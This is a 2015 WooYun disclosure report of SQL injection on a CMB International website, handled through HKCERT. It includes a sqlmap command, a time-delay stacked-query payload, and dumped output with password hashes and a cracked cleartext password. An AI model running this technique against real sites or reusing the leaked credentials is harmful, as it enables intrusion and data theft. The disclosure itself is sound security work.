当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153414

漏洞标题:招銀國際金融有限公司某站點存在SQL插入攻擊(sa密碼泄露/12個庫)(香港地區)

相关厂商:招銀國際金融有限公司

漏洞作者: 路人甲

提交时间:2015-11-11 10:26

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

招商银行成立於1987年4月8日,是中国第一家完全由企业法人持股的股份制商业银行,总行设在深圳。2002年4月9日於上海证券交易所上市(上交所号票代码: 600036)。 2006年9月22日招商银行在香港联合交易所 (3968.HK) 正式掛牌上市。
凭藉持续的金融创新、优质的客户服务、稳健的经营风格和良好的经营业绩,招行现已发展成為中国境内最具品牌影响力的商业银行之一。在银监会对商业银行的综合评级中,招行多年来一直名列前茅。同时荣膺英国《金融时报》、《欧洲货币》、《财资》(The Asset)等权威媒体授予的"最佳商业银行"、"最佳零售银行""中国区最佳私人银行"、"中国最佳託管专业银行"多项殊荣。在英国《金融时报》发佈的全球银行市净率排行榜中,招行在全球市值最大的50家银行中,市凈率排名第一。在英国《银行家》(The Banker)杂誌发佈的2011年"全球1000家大银行"排名中,位居第60位。

详细说明:

地址:http://**.**.**.**/cmbisc/news/content.aspx?id=2583321

python sqlmap.py -u "http://**.**.**.**/cmbisc/news/content.aspx?id=2583321" -p id --technique=S --random-agent --batch  -D master --count

漏洞证明:

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current user: 'webserver'
current user is DBA: False
database management system users [4]:
[*] BUILTIN\\Administrators
[*] sa
[*] SCPLogin
[*] webserver
database management system users password hashes:
[*] sa [1]:
password hash: 0x0500ea:2077f86ec33f81833c9Aecf5eb77h847c277bda1f7775006f00F>cfd5eiedb443a94e3feb3fa91f0f5eda
[*] SCPLogin [1]:
password hash: 0x01007e0c474f05abc1e5cfcf3d1e85070fc8b77c21b8343af82ff759cbf1c8f3a40169a4ea21a28c7e5b0ff973ea
header: 0x0100
salt: 7e0c474f
mixedcase: 05abc1e5cfcf3d1e85070fc8b77c21b8343af82f
uppercase: f759cbf1c8f3a40169a4ea21a28c7e5b0ff973ea
clear-text password: P@ssw0rd
[*] webserver [1]:
password hash: 0x0100a7096f5ae187e668ade76148bfd8dd291951fa77a1bdbbbe0bebc661086a9ebebe4e1cf05a0f12f7db9414be
header: 0x0100
salt: a7096f5a
mixedcase: e187e668ade76148bfd8dd291951fa77a1bdbbbe
uppercase: 0bebc661086a9ebebe4e1cf05a0f12f7db9414be
Database: infocast_data
+--------------+---------+
| Table | Entries |
+--------------+---------+
| dbo.COMPSTAT | 4 |
| dbo.[\x05] | 1 |
| dbo.[\x05] | 1 |
| dbo.[\x05] | 1 |
+--------------+---------+
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=2583321';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [12]:
[*] BlackRock
[*] Huanan_admin
[*] infocast_content
[*] infocast_data
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] RB_Portal
[*] SCB
[*] tempdb

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-20 16:50

厂商回复:

已將漏洞報告給網站聯絡人

最新状态:

暂无